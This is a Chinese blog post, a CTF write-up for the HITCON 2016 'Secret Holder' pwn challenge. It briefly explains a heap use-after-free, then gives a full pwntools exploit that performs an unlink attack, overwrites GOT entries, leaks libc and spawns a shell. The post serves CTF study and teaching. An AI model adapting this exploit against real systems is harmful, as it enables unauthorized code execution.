[XCTF-pwn] 35_hitcon-ctf-2016_secret_holder

最新推荐文章于 2024-04-22 23:48:00 发布
最新推荐文章于 2024-04-22 23:48:00 发布
阅读量272 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123382618
版权

区块会因为top_chunk不够大在新地址新建,释放后收回,这时建小块在旧地址释放,再建巨块时会在旧地址扩充。

程序未开pie,free时只清标记,但free时不检查标记,可以UAF。

思路:

  1. 建巨块释放建小块释放再建巨块(在旧堆块,与小块同一块)
  2. 由于未删指针,此时小块巨块指针相同,释放小块实然上是释放大块,大块标记保留。
  3. 建小块和大块,通过巨块指针修改小块和大块头unlink
  4. 控制指针区后随便搞。

完整exp:

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
else:
    p = remote('111.200.241.244', 53348) 
    libc_elf = ELF('./libc6_2.19-0ubuntu6.15_amd64.so')


elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

def add(idx, msg):
    p.sendlineafter(b"3. Renew secret\n", b'1')
    p.sendlineafter(b"3. Huge secret\n", str(idx).encode())
    p.sendafter(b"Tell me your secret: ", msg)

def free(idx):
    p.sendlineafter(b"3. Renew secret\n", b'2')
    p.sendlineafter(b"3. Huge secret\n", str(idx).encode())

def edit(idx, msg):
    p.sendlineafter(b"3. Renew secret\n", b'3')
    p.sendlineafter(b"3. Huge secret\n", str(idx).encode())
    p.sendafter(b"Tell me your secret: ", msg)

add(3, b'A')
free(3)
add(1, b'A')
free(1)
#0x0000000000953000 0x0000000000974000 0x0000000000000000 rw- [heap]
add(3, b'A')
#0x0000000000953000 0x00000000009d5000 0x0000000000000000 rw- [heap]
free(1)

#unlink
add(1, b'A')
add(2, b'A')
ptr_addr = 0x6020b0
edit(3, flat(0,0x21, ptr_addr-0x18, ptr_addr-0x10, 0x20, 0xfb0))
free(2)

edit(1, flat(b'/bin/sh\x00',elf.got['free'],elf.got['puts'], ptr_addr-0x18)+ p32(1)*2)  #2->got.free 3->got.puts 1->ptr_2
edit(2, flat(elf.plt['puts']))
free(3)
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

edit(2, flat(libc_elf.sym['system']))
free(1)
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
secretHolder_hitcon_2016(有关mmap的chunk如何分配到top chunk里与普通chunk相邻)
seaaseesa的博客
04-30 670
secretHolder_hitcon_2016 这题和上一题https://blog.csdn.net/seaaseesa/article/details/105856878功能相似,并且上一题的利用手法这里同样可以利用,这里,有另一种手法,从而引出了一个新的知识点。 这题,delete功能里增加了对huge chunk的free Huge chunk的大小为0x61A80,...
XCTF pwn例题思路整理 侵删
londonyan的博客
11-15 3896
XCTF pwn例题思路整理 侵删 1 .decode("iso-8859-1")处理报错 2 read() 栈溢出 函数定义:ssize_t read(int fd, void * buf, size_t count); 函数说明:read()会把参数fd所指的文件传送count 个字节到buf 指针所指的内存中。 返回值:返回值为实际读取到的字节数, 如果返回0, 表示已到达文...
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1103
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow-PWN-栈溢出(pwn35
Welcome To Myon'Blog !
04-22 438
从指定的输入流 stream 中读取最多 63 个字符(因为最后一个位置留给了空字符 '\0')到名为 flag 的字符数组中;当程序执行中发生段错误时,会触发 SIGSEGV 信号,此时程序会自动调用 sigsegv_handler 函数进行处理。使用 strcpy 函数将 src 指向的字符串拷贝到 dest 中,返回指向 dest 的指针,即拷贝后的字符串的起始地址。ctfshow 的函数接受一个指向字符数组的指针 char *src 作为参数;没有输出 flag,因为不存在溢出,程序没有出错。
CTFshow-pwn入门-栈溢出pwn35-pwn36
T1ngSh0w的博客
06-21 950
CTFshow-pwn入门-栈溢出pwn35-pwn36
unlink-secretholder
csdn546229768的博客
01-13 227
题目 : hitconctf2016-secretholder 保护: add函数: dele函数: update函数: 总体下来可以发现程序很简单,漏洞有uaf 和 double free,堆块类型是否可以malloc \ 修改由bss段中的xx_is_use决定,无pie,可通过修改got表或者将one_gadget写入__malloc_hook__free_hook中getshell,那么这里的限制条件就是只能malloc三种类型的chunk,分别是一个fast chunk和2个large
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
xctf pwn1
qq_41071646的博客
05-14 959
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
攻防世界PWNsecret_holder题解
seaaseesa的博客
02-07 1016
secret_holder 本题,附件在https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder,刷题网站上没有提供 拿到附件,我们先检查一下程序的保护机制 然后,我们用IDA分析一下 Free后没有清空指针,可以造成多次重复free 可以多次创建堆,只要我们free后再创建即可 那么,本题,我们可以利用...
攻防世界 pwn 进阶 secret_holder
yongbaoii的博客
02-18 339
进去给了个网站让我自己下载附件,找半天没找到,最终还是嫖了个现成的。 https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder 看一手保护,PIE没有开,还好,RELRO也没有全开,第一想法可以考虑劫持一手GOT表。 又是菜单题,主程序简单,且有循环。 程序很简单,三个秘密,然后地址跟flag都在bss段上,分别占了八个跟四个字节。 同时calloc函数跟malloc函数一样,申请空间,区别是calloc函数会把申请到得空间都清零。
HITCON_CTF_2016_Secret Holder
人饭子的博客
12-31 280
HITCON_CTF_2016:Secret Holder 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocatio...
sleepyHolder_hitcon_2016(fastbin的检查机制+malloc_consolidate+double free)
seaaseesa的博客
04-30 1015
sleepyHolder_hitcon_2016 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能没有清空指针,并且也没有校验,因此可以double free。 Edit功能又验证标志,因此不能UAF编辑 Add功能可以创建三种规格的堆。 由于没有开启PIE,并且堆指针存储在bss上,因此unlink是比较好的方法。但是不能溢出, 而要想成功d...
新闻阅读器.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
Windows Server 2008R2 sp1 升级 Service Pack 1
08-04
windows Server 2008 R2 Standard 升级 Service Pack 1 《Windows Server 2008 R2 SP1与IE11及依赖包详解》 Windows Server 2008 R2 SP1(Service Pack 1)是微软公司针对其服务器操作系统Windows Server 2008 R2的一个重要更新,旨在增强系统性能、提升安全性,并修复了大量已知问题。SP1的引入,不仅包含了自Windows Server 2008 R2发布以来的所有累积更新,还提供了对新技术的支持,例如Hyper-V 3.0虚拟化技术,提高了云计算和数据中心的管理效率。 IE11(Internet Explorer 11)是微软推出的最后一个版本的传统IE浏览器,对于Windows Server 2008 R2 SP1来说,这是一个重要的升级。IE11带来了更快的网页加载速度、更好的标准支持以及增强的安全特性。它支持HTML5、CSS3等现代Web技术,提供了更好的用户体验,并且增强了对企业级应用的兼容性。
基于python的crazy管理系统 (5).zip
最新发布
08-04
安装包
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值